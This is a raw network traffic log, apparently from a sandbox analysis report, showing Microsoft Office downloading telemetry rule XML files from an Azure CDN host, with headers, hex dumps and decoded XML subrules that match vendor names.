                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:20 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 415
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                      x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125920Z-1746fd949bdhk6hphC1EWRaw3c00000000wg00000000arer
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:20 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      77192.168.2.44984113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:20 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:20 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 471
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                      x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125920Z-1746fd949bdjzh7thC1EWR3g64000000018g000000007qsv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      78192.168.2.44984213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:20 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:20 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                      x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125920Z-1746fd949bdqpttnhC1EWRe1wg00000000x000000000ah41
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      79192.168.2.44984413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:20 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:21 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 477
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                      x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125921Z-1746fd949bddtfvqhC1EWRxbpg000000017g000000003mmy
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      80192.168.2.44984713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:22 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:23 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                      x-ms-request-id: 901a75be-701e-0053-76cb-453a0a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125923Z-1746fd949bddgsvjhC1EWRum2c00000001hg000000004xdk
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      81192.168.2.44984813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:22 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:23 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 472
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                      x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125923Z-1746fd949bdlnsqphC1EWRurw00000000150000000003h9k
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      82192.168.2.44984513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:22 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:22 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                      x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125922Z-1746fd949bdwt8wrhC1EWRu6rg000000018g00000000c2wp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      83192.168.2.44984613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:22 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:23 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 477
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                      x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125923Z-1746fd949bd54zxghC1EWRzre400000001dg00000000b6f1
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      84192.168.2.44985313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:24 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:25 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 485
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                      x-ms-request-id: 6fdb675e-b01e-0070-05ce-451cc0000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125925Z-1746fd949bd7wvgbhC1EWR0rgs000000018g000000008k4t
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:25 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      85192.168.2.44985213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:24 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:25 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 470
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                      x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125925Z-1746fd949bddgsvjhC1EWRum2c00000001m0000000001zxp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:25 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      86192.168.2.44985113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:24 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:25 GMT
                                                                                                                                                      Content-Type: text/xml
